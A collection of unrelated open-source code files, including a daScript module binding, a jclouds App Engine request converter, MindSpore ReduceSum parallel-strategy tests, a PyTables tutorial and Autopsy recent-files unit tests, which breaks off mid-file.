     * @param delayer  A {@link CompletionStage} which is completed when it is allowed to start sending the state.
     */
    void execute(Flowable<XSiteState> flowable, CompletionStage<Void> delayer);
}
| 238 |
421 | #include "daScript/daScript.h"
#include "tutorial02aot.h"
using namespace das;
// making custom builtin module
class Module_Tutorial02 : public Module {
public:
    Module_Tutorial02() : Module("tutorial_02") { // module name, when used from das file
        ModuleLibrary lib;
        lib.addModule(this);
        lib.addBuiltInModule();
        // adding constant to the module
        // use a float literal so no double->float conversion is involved
        addConstant(*this,"SQRT2",sqrtf(2.0f));
        // adding function to the module
        addExtern<DAS_BIND_FUN(xmadd)>(*this, lib, "xmadd",SideEffects::none, "xmadd");
        // and verify
        verifyAotReady();
    }
    virtual ModuleAotType aotRequire ( TextWriter & tw ) const override {
        // specifying which include files are required for this module
        tw << "#include \"tutorial02aot.h\"\n";
        // specifying AOT type, in this case direct cpp mode (and not hybrid mode)
        return ModuleAotType::cpp;
    }
};
// registering module, so that its available via 'NEED_MODULE' macro
REGISTER_MODULE(Module_Tutorial02);
324 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.jclouds.gae;
import static com.google.appengine.api.urlfetch.FetchOptions.Builder.disallowTruncate;
import java.io.IOException;
import java.io.InputStream;
import java.net.MalformedURLException;
import java.net.URL;
import java.util.Map.Entry;
import java.util.Set;
import javax.inject.Inject;
import javax.inject.Singleton;
import org.jclouds.http.HttpRequest;
import org.jclouds.http.HttpUtils;
import org.jclouds.io.ContentMetadataCodec;
import org.jclouds.io.Payload;
import org.jclouds.util.Closeables2;
import com.google.appengine.api.urlfetch.FetchOptions;
import com.google.appengine.api.urlfetch.HTTPHeader;
import com.google.appengine.api.urlfetch.HTTPMethod;
import com.google.appengine.api.urlfetch.HTTPRequest;
import com.google.appengine.repackaged.com.google.common.base.Throwables;
import com.google.common.base.Function;
import com.google.common.collect.ImmutableSet;
import com.google.common.io.ByteStreams;
import com.google.common.net.HttpHeaders;
@Singleton
public class ConvertToGaeRequest implements Function<HttpRequest, HTTPRequest> {
   public static final String USER_AGENT = "jclouds/1.0 urlfetch/1.4.3";
   // http://code.google.com/appengine/docs/java/urlfetch/overview.html
   // Headers that must not be copied onto a urlfetch request.
   public final Set<String> prohibitedHeaders = ImmutableSet.of("Accept-Encoding", "Content-Length", "Host", "Var",
         "X-Forwarded-For");
   protected final HttpUtils utils;
   protected final ContentMetadataCodec contentMetadataCodec;
   @Inject
   ConvertToGaeRequest(HttpUtils utils, ContentMetadataCodec contentMetadataCodec) {
      this.utils = utils;
      this.contentMetadataCodec = contentMetadataCodec;
   }
   /**
    * Converts a jclouds {@link HttpRequest} into a GAE urlfetch {@link HTTPRequest}.
    * <p>
    * byte [] content is replayable and the only content type supportable by GAE. As such, we
    * convert the original request content to a byte array.
    */
   @Override
   public HTTPRequest apply(HttpRequest request) {
      URL url = null;
      try {
         url = request.getEndpoint().toURL();
      } catch (MalformedURLException e) {
         Throwables.propagate(e);
      }
      FetchOptions options = disallowTruncate();
      // redirects are never followed by urlfetch; jclouds handles them itself
      options.doNotFollowRedirects();
      // NOTE(review): the original also called doNotFollowRedirects() a second time
      // when relaxHostname()/trustAllCerts() were set; that call was a redundant
      // no-op and has been removed without changing behavior.
      options.setDeadline(10.0);
      HTTPRequest gaeRequest = new HTTPRequest(url, HTTPMethod.valueOf(request.getMethod().toString()), options);
      for (Entry<String, String> entry : request.getHeaders().entries()) {
         String header = entry.getKey();
         if (!prohibitedHeaders.contains(header))
            gaeRequest.addHeader(new HTTPHeader(header, entry.getValue()));
      }
      gaeRequest.addHeader(new HTTPHeader(HttpHeaders.USER_AGENT, USER_AGENT));
      if (request.getPayload() != null) {
         InputStream input = request.getPayload().getInput();
         try {
            // Buffer the payload so it can be replayed; also swap it onto the
            // jclouds request if the original payload was one-shot.
            byte[] array = ByteStreams.toByteArray(input);
            if (!request.getPayload().isRepeatable()) {
               Payload oldPayload = request.getPayload();
               request.setPayload(array);
               HttpUtils.copy(oldPayload.getContentMetadata(), request.getPayload().getContentMetadata());
            }
            gaeRequest.setPayload(array);
            if (array.length > 0) {
               gaeRequest.setHeader(new HTTPHeader("Expect", "100-continue"));
            }
         } catch (IOException e) {
            Throwables.propagate(e);
         } finally {
            Closeables2.closeQuietly(input);
         }
         for (Entry<String, String> header : contentMetadataCodec.toHeaders(
               request.getPayload().getContentMetadata()).entries()) {
            if (!prohibitedHeaders.contains(header.getKey()))
               gaeRequest.setHeader(new HTTPHeader(header.getKey(), header.getValue()));
         }
      }
      return gaeRequest;
   }
}
| 1,783 |
531 | // Copyright 1998-2019 Epic Games, Inc. All Rights Reserved.
#include "ProfilingBlocks.h"
#include "Modules/ModuleManager.h"
IMPLEMENT_PRIMARY_GAME_MODULE( FDefaultGameModuleImpl, ProfilingBlocks, "ProfilingBlocks" );
| 70 |
class Solution(object):
    """LeetCode 20 — Valid Parentheses."""

    def isValid(self, s):
        """Return True iff every bracket in ``s`` is closed in the right order.

        Any character other than the six bracket characters makes the
        string invalid, matching the original behavior.

        :type s: str
        :rtype: bool
        """
        closer_to_opener = {')': '(', ']': '[', '}': '{'}
        stack = []
        for ch in s:
            if ch in '([{':
                stack.append(ch)
            elif ch in closer_to_opener and stack and stack[-1] == closer_to_opener[ch]:
                stack.pop()
            else:
                # Mismatched closer, closer on empty stack, or foreign character.
                return False
        # Valid only if nothing is left unclosed.
        return not stack
310 | <reponame>dreeves/usesthis<filename>gear/software/k/kaleidoscope.json
{
"name": "Kaleidoscope",
"description": "A file and image diff app for the Mac.",
"url": "https://www.kaleidoscopeapp.com/"
} | 76 |
448 | <reponame>sintaxi/phonegap<gh_stars>100-1000
/**
* The MIT License
* -------------------------------------------------------------
* Copyright (c) 2008, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>, Nitobi
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in
* all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
* THE SOFTWARE.
*/
package com.nitobi.phonegap.api.impl;
import net.rim.device.api.system.Alert;
import com.nitobi.phonegap.api.Command;
/**
* Vibrates the phone if able.
*
* @author <NAME>
*
*/
public class NotificationCommand implements Command {
private static final int VIBRATE_COMMAND = 0;
private static final int BEEP_COMMAND = 1;
private static final int DURATION = 5;
private static final String CODE = "PhoneGap=notification";
private static final short A = 440; //440.00
private static final short NOTE_DURATION = 500;
private static final short PAUSE_DURATION = 50;
private static final int TUNE_LENGTH = 4;
private static final short[] TUNE = new short[]
{
A, NOTE_DURATION, 0, PAUSE_DURATION
};
/**
* Determines whether the specified instruction is accepted by the command.
* @param instruction The string instruction passed from JavaScript via cookie.
* @return true if the Command accepts the instruction, false otherwise.
*/
public boolean accept(String instruction) {
return instruction != null && instruction.startsWith(CODE);
}
public String execute(String instruction) {
switch (getCommand(instruction)) {
case VIBRATE_COMMAND:
if (Alert.isVibrateSupported()) Alert.startVibrate(getVibrateDuration(instruction));
break;
case BEEP_COMMAND:
if (Alert.isAudioSupported()) Alert.startAudio(getTune(instruction), 99);
break;
}
return null;
}
private int getCommand(String instruction) {
String command = instruction.substring(CODE.length()+1);
if (command.startsWith("beep")) return BEEP_COMMAND;
if (command.startsWith("vibrate")) return VIBRATE_COMMAND;
return -1;
}
/**
* Parses the vibrate instruction and tries to extract the specified duration. Returns the default duration if there are issues parsing.
* @param instruction The instruction called from the JS.
* @return The number of seconds the vibration should last.
*/
private int getVibrateDuration(String instruction) {
try {
return Integer.parseInt(instruction.substring(instruction.lastIndexOf('/') + 1));
} catch(Exception ex) {
return DURATION;
}
}
private short[] getTune(String instruction) {
String beepParam = instruction.substring(CODE.length()+1);
int param = 1;
try {
param = Integer.parseInt(beepParam.substring(beepParam.indexOf('/')+1));
} catch(Exception e) {
param = 1;
}
short[] theTune = new short[TUNE_LENGTH * param];
if (param == 1)
return TUNE;
else {
for (int i = 0; i < param; i++) {
System.arraycopy(TUNE, 0, theTune, i*TUNE_LENGTH, TUNE_LENGTH);
}
}
return theTune;
}
} | 1,218 |
3,200 | /**
* Copyright 2019 Huawei Technologies Co., Ltd
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <string>
#include <list>
#include <vector>
#include "common/common_test.h"
#include "frontend/parallel/strategy.h"
#include "frontend/parallel/ops_info/reduce_method_info.h"
#include "common/py_func_graph_fetcher.h"
#include "frontend/parallel/device_manager.h"
#include "frontend/parallel/step_parallel.h"
namespace mindspore {
namespace parallel {
using ReduceSumInfoPtr = std::shared_ptr<ReduceSumInfo>;
// Shared operator instance rebuilt by TestReduceSumInfo::SetUp before each test.
ReduceSumInfoPtr reduce_sum;
// Fixture for ReduceSumInfo parallel-strategy tests; SetUp builds the global
// device manager and the shared reduce_sum operator instance.
class TestReduceSumInfo : public UT::Common {
 public:
  TestReduceSumInfo() {}
  void SetUp();
  void TearDown() {}
};
void TestReduceSumInfo::SetUp() {
  UT::InitPythonPath();
  RankList dev_list;
  // 34 devices in total, split into the two stages declared below (32 + 2).
  for (int32_t i = 0; i < 34; i++) {
    dev_list.push_back(i);
  }

  RankList stage_map;
  stage_map.push_back(32);
  stage_map.push_back(2);

  int32_t local_dev = 0;

  // create a new g_device_manager
  g_device_manager = std::make_shared<DeviceManager>();
  g_device_manager->Init(dev_list, local_dev, stage_map, "hccl");

  // Reduce a [16, 32, 64] tensor to [16, 32]. The -1 below is presumably the
  // reduction axis (last dimension) -- confirm against ReduceSumInfo's input
  // value layout.
  Shapes inputs_shape = {{16, 32, 64}};
  Shapes outputs_shape = {{16, 32}};
  ValuePtr value = MakeValue(static_cast<int64_t>(-1));
  ValuePtr value0;  // intentionally left null: the first input slot carries no value
  std::vector<ValuePtr> val = {value0, value};
  ValuePtr keep_dims = MakeValue(false);
  std::unordered_map<std::string, ValuePtr> attr = {{KEEP_DIMS, keep_dims}};
  reduce_sum = std::make_shared<ReduceSumInfo>("sum_info", inputs_shape, outputs_shape, attr);
  reduce_sum->set_input_value(val);
}
TEST_F(TestReduceSumInfo, InferDevMatrixShape1) {
  // With strategy (4, 8, 1), the inferred device matrix mirrors the strategy.
  Strategys stra = {{4, 8, 1}};
  StrategyPtr stra_ptr = NewStrategy(0, stra);
  reduce_sum->Init(stra_ptr);

  Shape expected_dev_matrix = {4, 8, 1};
  ASSERT_EQ(reduce_sum->dev_matrix_shape(), expected_dev_matrix);
}
TEST_F(TestReduceSumInfo, InferSliceShape1) {
  // Splitting [16, 32, 64] by (4, 8, 1) gives each device a [4, 4, 64] input
  // slice and a [4, 4] output slice.
  Strategys stra = {{4, 8, 1}};
  reduce_sum->Init(NewStrategy(0, stra));

  TensorInfo input_info = reduce_sum->inputs_tensor_info().at(0);
  TensorInfo output_info = reduce_sum->outputs_tensor_info().at(0);

  Shape expected_input_slice = {4, 4, 64};
  Shape expected_output_slice = {4, 4};
  ASSERT_EQ(input_info.slice_shape(), expected_input_slice);
  ASSERT_EQ(output_info.slice_shape(), expected_output_slice);
}
TEST_F(TestReduceSumInfo, GetTensorLayout1) {
  Strategys str = {{4, 8, 1}};
  StrategyPtr strategy = NewStrategy(0, str);
  reduce_sum->Init(strategy);
  std::vector<TensorInfo> inputs = reduce_sum->inputs_tensor_info();
  std::vector<TensorInfo> outputs = reduce_sum->outputs_tensor_info();
  // Expected tensor maps: the input keeps all three device-matrix axes, the
  // output map drops one axis (the reduced dimension).
  TensorMap input_expect = {2, 1, 0};
  TensorMap output_expect = {2, 1};
  TensorInfo input_tensor_info = inputs.at(0);
  TensorInfo output_tensor_info = outputs.at(0);
  Map input_tensor_map = input_tensor_info.tensor_layout().origin_tensor_map();
  Map output_tensor_map = output_tensor_info.tensor_layout().origin_tensor_map();
  ASSERT_EQ(input_tensor_map.array(), input_expect);
  ASSERT_EQ(output_tensor_map.array(), output_expect);
}
TEST_F(TestReduceSumInfo, GetForwardOp1) {
  // The last (reduced) axis is unsplit under (4, 8, 1), so no forward
  // communication operator is generated.
  Strategys stra = {{4, 8, 1}};
  reduce_sum->Init(NewStrategy(0, stra));

  size_t op_count = reduce_sum->forward_op().size();
  ASSERT_EQ(op_count, 0);
}
TEST_F(TestReduceSumInfo, GetForwardOp2) {
  // The last (reduced) dimension is split across 2 devices, so the forward
  // graph must contain exactly one AllReduce with op="sum".
  Strategys inputs = {{4, 4, 2}};
  StrategyPtr strategy = NewStrategy(0, inputs);
  reduce_sum->Init(strategy);
  OperatorVector forward_op = reduce_sum->forward_op();
  OperatorArgs operator_args = forward_op.at(0).second;

  OperatorAttrs operator_attrs = operator_args.first;
  std::string arg0_name = operator_attrs.at(0).first;
  ValuePtr arg0_value = operator_attrs.at(0).second;
  std::string op_value = arg0_value->cast<StringImmPtr>()->ToString();

  std::string arg1_name = operator_attrs.at(1).first;
  ValuePtr arg1_value = operator_attrs.at(1).second;
  // group_value is device-dependent, so only the attribute name is asserted below.
  std::string group_value = arg1_value->cast<StringImmPtr>()->ToString();

  ASSERT_EQ(forward_op.at(0).first, "AllReduce");
  ASSERT_EQ(forward_op.size(), 1);
  ASSERT_EQ(arg0_name, "op");
  ASSERT_EQ(op_value, "sum");
  ASSERT_EQ(arg1_name, "group");
}
TEST_F(TestReduceSumInfo, GetMirrorOPs1) {
  // Strategy (4, 8, 1) occupies all 32 devices of the stage (4*8*1 = 32), so
  // no mirror operators are produced.
  Strategys stra = {{4, 8, 1}};
  reduce_sum->Init(NewStrategy(0, stra));

  size_t mirror_count = reduce_sum->mirror_ops().size();
  ASSERT_EQ(mirror_count, 0);
}
TEST_F(TestReduceSumInfo, GetMirrorOPs2) {
  // Strategy (4, 4, 1) covers only 4*4*1 = 16 of the 32 stage devices, so a
  // _MirrorOperator is presumably required for the replicated input -- the
  // test only checks the op name and its "group" attribute.
  Strategys inputs = {{4, 4, 1}};
  StrategyPtr strategy = NewStrategy(0, inputs);
  reduce_sum->Init(strategy);
  MirrorOps mirror_ops = reduce_sum->mirror_ops();
  OperatorVector mirror_op = mirror_ops.at(0);

  OperatorArgs operator_args = mirror_op.at(0).second;
  OperatorAttrs operator_attrs = operator_args.first;
  std::string arg0_name = operator_attrs.at(0).first;
  ValuePtr arg0_value = operator_attrs.at(0).second;
  // The concrete group string is device-dependent and is not asserted.
  std::string group = arg0_value->cast<StringImmPtr>()->ToString();

  ASSERT_EQ(mirror_op.at(0).first, "_MirrorOperator");
  ASSERT_EQ(mirror_op.size(), 1);
  ASSERT_EQ(arg0_name, "group");
}
TEST_F(TestReduceSumInfo, CheckStrategy1) {
  // A rank-4 strategy cannot apply to the rank-3 input, so Init must fail.
  Strategys bad_stra = {{2, 2, 8, 16}};
  StrategyPtr stra_ptr = NewStrategy(0, bad_stra);
  ASSERT_EQ(reduce_sum->Init(stra_ptr), FAILED);
}
TEST_F(TestReduceSumInfo, CheckStrategy2) {
  // ReduceSum takes a single tensor input; a two-tuple strategy must fail.
  Strategys bad_stra = {{2, 4, 8}, {2, 4, 8}};
  StrategyPtr stra_ptr = NewStrategy(0, bad_stra);
  ASSERT_EQ(reduce_sum->Init(stra_ptr), FAILED);
}
TEST_F(TestReduceSumInfo, CheckStrategy3) {
  // A matching rank-3 strategy that splits the last axis is accepted.
  Strategys good_stra = {{4, 4, 2}};
  StrategyPtr stra_ptr = NewStrategy(0, good_stra);
  ASSERT_EQ(reduce_sum->Init(stra_ptr), SUCCESS);
}
TEST_F(TestReduceSumInfo, CheckStrategy4) {
  // A rank-3 strategy leaving the last axis unsplit also initializes cleanly.
  Strategys good_stra = {{4, 8, 1}};
  StrategyPtr stra_ptr = NewStrategy(0, good_stra);
  ASSERT_EQ(reduce_sum->Init(stra_ptr), SUCCESS);
}
} // namespace parallel
} // namespace mindspore
| 2,465 |
from __future__ import print_function, absolute_import, division, unicode_literals

# Minified aliases produced by the source compactor.
_B = False
_A = None

from .anchor import Anchor

# Typing imports are for static analysis only; the guard is always false at runtime.
if _B: from typing import Text, Any, Dict, List

__all__ = ['ScalarBoolean']
class ScalarBoolean(int):
    """An int subclass representing a YAML boolean that can carry an anchor."""

    def __new__(cls, *args, **kw):
        # Strip the optional ``anchor`` keyword before constructing the int;
        # int.__new__ would reject unknown keyword arguments.
        anchor = kw.pop('anchor', None)
        obj = int.__new__(cls, *args, **kw)
        if anchor is not None:
            obj.yaml_set_anchor(anchor, always_dump=True)
        return obj

    @property
    def anchor(self):
        # Lazily attach an Anchor instance on first access.
        if not hasattr(self, Anchor.attrib):
            setattr(self, Anchor.attrib, Anchor())
        return getattr(self, Anchor.attrib)

    def yaml_anchor(self, any=False):
        # Report the anchor only when one exists and should be emitted.
        if not hasattr(self, Anchor.attrib):
            return None
        if any or self.anchor.always_dump:
            return self.anchor
        return None

    def yaml_set_anchor(self, value, always_dump=False):
        self.anchor.value = value
        self.anchor.always_dump = always_dump
869 | <filename>doc/source/cookbook/py2exe_howto/pytables_test.py
import tables as tb
class Particle(tb.IsDescription):
    """Row schema for the 'readout' table: one detector particle per row."""
    name = tb.StringCol(16)  # 16-character String
    idnumber = tb.Int64Col()  # Signed 64-bit integer
    ADCcount = tb.UInt16Col()  # Unsigned short integer
    TDCcount = tb.UInt8Col()  # Unsigned byte
    grid_i = tb.Int32Col()  # Integer
    grid_j = tb.IntCol()  # Integer (equivalent to Int32Col)
    pressure = tb.Float32Col()  # Float (single-precision)
    energy = tb.FloatCol()  # Double (double-precision)
with tb.open_file("tutorial.h5", mode="w", title="Test file") as h5file:
group = h5file.create_group("/", "detector", "Detector information")
table = h5file.create_table(group, "readout", Particle, "Readout example")
print(h5file)
particle = table.row
for i in range(10):
particle['name'] = f'Particle: {i:6d}'
particle['TDCcount'] = i % 256
particle['ADCcount'] = (i * 256) % (1 << 16)
particle['grid_i'] = i
particle['grid_j'] = 10 - i
particle['pressure'] = float(i * i)
particle['energy'] = float(particle['pressure'] ** 4)
particle['idnumber'] = i * (2 ** 34)
particle.append()
table.flush()
with tb.open_file("tutorial.h5", mode="r", title="Test file") as h5file:
table = h5file.root.detector.readout
pressure = [x['pressure']
for x in table.iterrows()
if x['TDCcount'] > 3 and 20 <= x['pressure'] < 50]
print(pressure)
| 636 |
584 | package com.mercury.platform.ui.adr.components.panel.tree.dialog;
import com.mercury.platform.shared.config.descriptor.adr.AdrComponentDescriptor;
import com.mercury.platform.shared.config.descriptor.adr.AdrProgressBarDescriptor;
import com.mercury.platform.ui.adr.components.panel.tree.AdrNodePanel;
import com.mercury.platform.ui.adr.components.panel.tree.model.AdrTreeNode;
import com.mercury.platform.ui.adr.components.panel.ui.MercuryTracker;
import com.mercury.platform.ui.misc.AppThemeColor;
import javax.swing.*;
import java.awt.*;
/**
 * Tree-dialog node panel showing a static preview of a progress-bar descriptor.
 */
public class AdrDialogPBNodePanel extends AdrNodePanel<AdrProgressBarDescriptor> {

    public AdrDialogPBNodePanel(AdrTreeNode<AdrComponentDescriptor> treeNode) {
        super(treeNode);
        this.mouseListener.setProcessSelect(false);
    }

    @Override
    protected void update() {
        // Intentionally empty: this preview panel has no state to refresh.
    }

    @Override
    public void onViewInit() {
        // Build the preview tracker first, seeded at half of the descriptor's duration.
        MercuryTracker previewTracker = new MercuryTracker(descriptor);
        previewTracker.setValue((int) ((descriptor.getDuration() / 2) * 1000));
        previewTracker.setPreferredSize(new Dimension(180, 30));
        previewTracker.setShowCase(true);

        JPanel contentPane = this.componentsFactory.getJPanel(new FlowLayout(FlowLayout.CENTER));
        contentPane.setBackground(AppThemeColor.SLIDE_BG);
        contentPane.add(previewTracker);
        this.add(contentPane, BorderLayout.CENTER);
    }
}
| 508 |
1,473 | /*
* Autopsy Forensic Browser
*
* Copyright 2020 Basis Technology Corp. Contact: carrier <at> sleuthkit <dot>
* org
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy of
* the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
*/
package org.sleuthkit.autopsy.datasourcesummary.datamodel;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.function.Function;
import java.util.stream.Collectors;
import java.util.stream.IntStream;
import java.util.stream.Stream;
import org.apache.commons.lang3.tuple.Pair;
import org.junit.Assert;
import static org.junit.Assert.fail;
import org.junit.Test;
import static org.mockito.ArgumentMatchers.anyInt;
import static org.mockito.ArgumentMatchers.anyLong;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.never;
import static org.mockito.Mockito.times;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.when;
import org.sleuthkit.autopsy.datasourcesummary.datamodel.RecentFilesSummary.RecentAttachmentDetails;
import org.sleuthkit.autopsy.datasourcesummary.datamodel.RecentFilesSummary.RecentDownloadDetails;
import org.sleuthkit.autopsy.datasourcesummary.datamodel.RecentFilesSummary.RecentFileDetails;
import org.sleuthkit.autopsy.datasourcesummary.datamodel.SleuthkitCaseProvider.SleuthkitCaseProviderException;
import org.sleuthkit.autopsy.testutils.RandomizationUtils;
import org.sleuthkit.autopsy.testutils.TskMockUtils;
import org.sleuthkit.datamodel.Blackboard;
import org.sleuthkit.datamodel.BlackboardArtifact;
import org.sleuthkit.datamodel.BlackboardArtifact.ARTIFACT_TYPE;
import org.sleuthkit.datamodel.BlackboardAttribute;
import org.sleuthkit.datamodel.BlackboardAttribute.ATTRIBUTE_TYPE;
import org.sleuthkit.datamodel.Content;
import org.sleuthkit.datamodel.DataSource;
import org.sleuthkit.datamodel.SleuthkitCase;
import org.sleuthkit.datamodel.TskCoreException;
/**
* Tests for RecentFilesSummaryTest
*/
public class RecentFilesSummaryTest {
    /**
     * An interface for calling methods in RecentFilesSummary in a uniform
     * manner.
     *
     * @param <T> The row type returned by the summary method under test.
     */
    private interface RecentFilesMethod<T> {

        /**
         * Means of acquiring data from a method in RecentFilesSummary.
         *
         * @param recentFilesSummary The RecentFilesSummary object.
         * @param dataSource The datasource.
         * @param count The number of items to retrieve.
         *
         * @return The method's return data.
         *
         * @throws SleuthkitCaseProviderException
         * @throws TskCoreException
         */
        List<T> fetch(RecentFilesSummary recentFilesSummary, DataSource dataSource, int count)
                throws SleuthkitCaseProviderException, TskCoreException;
    }
    /** Adapter invoking RecentFilesSummary.getRecentlyOpenedDocuments. */
    private static final RecentFilesMethod<RecentFileDetails> RECENT_DOCS_FUNCT
            = (summary, dataSource, count) -> summary.getRecentlyOpenedDocuments(dataSource, count);

    /** Adapter invoking RecentFilesSummary.getRecentDownloads. */
    private static final RecentFilesMethod<RecentDownloadDetails> RECENT_DOWNLOAD_FUNCT
            = (summary, dataSource, count) -> summary.getRecentDownloads(dataSource, count);

    /** Adapter invoking RecentFilesSummary.getRecentAttachments. */
    private static final RecentFilesMethod<RecentAttachmentDetails> RECENT_ATTACHMENT_FUNCT
            = (summary, dataSource, count) -> summary.getRecentAttachments(dataSource, count);
    /**
     * If -1 count passed to method, should throw IllegalArgumentException.
     *
     * @param method The method to call.
     * @param methodName The name of the method (used in failure messages).
     *
     * @throws TskCoreException
     * @throws SleuthkitCaseProviderException
     */
    private <T> void testNonPositiveCount_ThrowsError(RecentFilesMethod<T> method, String methodName)
            throws TskCoreException, SleuthkitCaseProviderException {
        Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(null);
        DataSource dataSource = TskMockUtils.getDataSource(1);

        RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
        try {
            method.fetch(summary, dataSource, -1);
            fail("Expected method " + methodName + " to fail on negative count.");
        } catch (IllegalArgumentException ignored) {
            // Expected path: the negative count must be rejected before any
            // Blackboard query is issued.
            verify(casePair.getRight(),
                    never().description("Expected negative count for " + methodName + " to not call any methods in SleuthkitCase."))
                    .getArtifacts(anyInt(), anyLong());
        }
    }
    @Test
    public void getRecentlyOpenedDocuments_nonPositiveCount_ThrowsError() throws TskCoreException, SleuthkitCaseProviderException {
        // Delegates the negative-count check to the shared helper.
        testNonPositiveCount_ThrowsError(RECENT_DOCS_FUNCT, "getRecentlyOpenedDocuments");
    }
    @Test
    public void getRecentDownloads_nonPositiveCount_ThrowsError() throws TskCoreException, SleuthkitCaseProviderException {
        // Delegates the negative-count check to the shared helper.
        testNonPositiveCount_ThrowsError(RECENT_DOWNLOAD_FUNCT, "getRecentDownloads");
    }
    @Test
    public void getRecentAttachments_nonPositiveCount_ThrowsError() throws TskCoreException, SleuthkitCaseProviderException {
        // Delegates the negative-count check to the shared helper.
        testNonPositiveCount_ThrowsError(RECENT_ATTACHMENT_FUNCT, "getRecentAttachments");
    }
    /**
     * Tests that if no data source provided, an empty list is returned and
     * SleuthkitCase isn't called.
     *
     * @param recentFilesMethod The method to call.
     * @param methodName The name of the method (used in failure messages).
     *
     * @throws SleuthkitCaseProviderException
     * @throws TskCoreException
     */
    private <T> void testNoDataSource_ReturnsEmptyList(RecentFilesMethod<T> recentFilesMethod, String methodName)
            throws SleuthkitCaseProviderException, TskCoreException {

        Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(null);
        RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());

        List<? extends T> items = recentFilesMethod.fetch(summary, null, 10);

        Assert.assertNotNull("Expected method " + methodName + " to return an empty list.", items);
        Assert.assertEquals("Expected method " + methodName + " to return an empty list.", 0, items.size());
        // A null data source should short-circuit before any Blackboard access.
        verify(casePair.getRight(),
                never().description("Expected null datasource for " + methodName + " to not call any methods in SleuthkitCase."))
                .getArtifacts(anyInt(), anyLong());
    }
    @Test
    public void getRecentlyOpenedDocuments_noDataSource_ReturnsEmptyList() throws TskCoreException, SleuthkitCaseProviderException {
        // Delegates the null-data-source check to the shared helper.
        testNoDataSource_ReturnsEmptyList(RECENT_DOCS_FUNCT, "getRecentlyOpenedDocuments");
    }
    @Test
    public void getRecentDownloads_noDataSource_ReturnsEmptyList() throws TskCoreException, SleuthkitCaseProviderException {
        // Delegates the null-data-source check to the shared helper.
        testNoDataSource_ReturnsEmptyList(RECENT_DOWNLOAD_FUNCT, "getRecentDownloads");
    }
@Test
public void getRecentAttachments_noDataSource_ReturnsEmptyList() throws TskCoreException, SleuthkitCaseProviderException {
testNonPositiveCount_ThrowsError(RECENT_ATTACHMENT_FUNCT, "getRecentAttachments");
}
    /**
     * If SleuthkitCase returns no results, an empty list is returned.
     *
     * @param recentFilesMethod The method to call.
     * @param methodName The name of the method (used in failure messages).
     *
     * @throws SleuthkitCaseProviderException
     * @throws TskCoreException
     */
    private <T> void testNoReturnedResults_ReturnsEmptyList(RecentFilesMethod<T> recentFilesMethod, String methodName)
            throws SleuthkitCaseProviderException, TskCoreException {

        Pair<SleuthkitCase, Blackboard> casePair = DataSourceSummaryMockUtils.getArtifactsTSKMock(Collections.emptyList());
        RecentFilesSummary summary = new RecentFilesSummary(() -> casePair.getLeft());
        DataSource dataSource = TskMockUtils.getDataSource(1);

        List<? extends T> items = recentFilesMethod.fetch(summary, dataSource, 10);

        Assert.assertNotNull("Expected method " + methodName + " to return an empty list.", items);
        Assert.assertEquals("Expected method " + methodName + " to return an empty list.", 0, items.size());
        // Unlike the null-data-source case, the query is expected to run exactly once.
        verify(casePair.getRight(),
                times(1).description("Expected " + methodName + " to call Blackboard once."))
                .getArtifacts(anyInt(), anyLong());
    }
    @Test
    public void getRecentlyOpenedDocuments_noReturnedResults_ReturnsEmptyList() throws TskCoreException, SleuthkitCaseProviderException {
        // Delegates the empty-Blackboard-results check to the shared helper.
        testNoReturnedResults_ReturnsEmptyList(RECENT_DOCS_FUNCT, "getRecentlyOpenedDocuments");
    }
    @Test
    public void getRecentDownloads_noReturnedResults_ReturnsEmptyList() throws TskCoreException, SleuthkitCaseProviderException {
        // Delegates the empty-Blackboard-results check to the shared helper.
        testNoReturnedResults_ReturnsEmptyList(RECENT_DOWNLOAD_FUNCT, "getRecentDownloads");
    }
    @Test
